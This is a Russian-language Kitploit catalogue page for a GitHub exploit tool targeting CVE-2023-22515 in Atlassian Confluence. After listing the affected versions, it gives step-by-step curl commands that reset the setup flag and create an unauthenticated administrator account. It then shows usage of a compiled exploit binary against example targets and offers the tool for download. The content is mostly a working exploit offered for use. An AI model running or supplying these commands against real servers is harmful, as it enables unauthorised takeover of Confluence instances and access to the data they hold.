Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-22515 — Инструмент эксплуатации уязвимости Confluence для неавторизованного добавления администратора (CVE-2023-22515) | Kitploit
Инструменты/GitHubGitHub/ad-calcium/cve-2023-22515
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияRed Teaming
GitHubad-calcium/cve-2023-22515

CVE-2023-22515

Инструмент эксплуатации уязвимости Confluence для неавторизованного добавления администратора (CVE-2023-22515)

Репозиторий
110812 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Инструмент Red Team - Эксплуатация уязвимости неавторизованного добавления администратора в Confluence (CVE-2023-22515)

Затронутые версии

root@kitploit:~
8.0.0 <= Confluence Data Center и Confluence Server <= 8.0.4
8.1.0 <= Confluence Data Center и Confluence Server <= 8.1.4
8.2.0 <= Confluence Data Center и Confluence Server <= 8.2.3
8.3.0 <= Confluence Data Center и Confluence Server <= 8.3.2
8.4.0 <= Confluence Data Center и Confluence Server <= 8.4.2
8.5.0 <= Confluence Data Center и Confluence Server <= 8.5.1

Эксплуатация уязвимости

1. Обычный доступ, указывающий, что установка завершена

root@kitploit:~
curl -vk http://IP/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false

2. Создание пользователя с правами администратора

root@kitploit:~
test123 Password2

Выполните следующую команду

root@kitploit:~
curl -vk -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=test123&fullName=test123&email=test123@localhost&password=Password2&confirm=Password2&setup-next-button=Next" http://IP/setup/setupadministrator.action

3. Установка завершена

root@kitploit:~
curl -vk -X POST -H "X-Atlassian-Token: no-check" http://IP/setup/finishsetup.action

Использование

root@kitploit:~
cve-2023-22515.exe
Usage of cve-2023-22515.exe:
  -pass string
        указать пароль для добавления
  -proxy string
        установить прокси
  -u string
        указать цель
  -user string
        указать имя пользователя для добавления

Случайные имя пользователя и пароль

root@kitploit:~
cve-2023-22515.exe -u http://10.108.3.117:8090

image-2023101116485852

Ручное добавление пользователя-администратора

root@kitploit:~
cve-2023-22515.exe -u http://10.108.3.117:8090 -user tesxe17 -pass Password2

image-20231011164858593

Журнал изменений

root@kitploit:~
[+] 2023/10/16 Добавлены случайные имя пользователя и пароль

Star History

Star History Chart

Скачать инструмент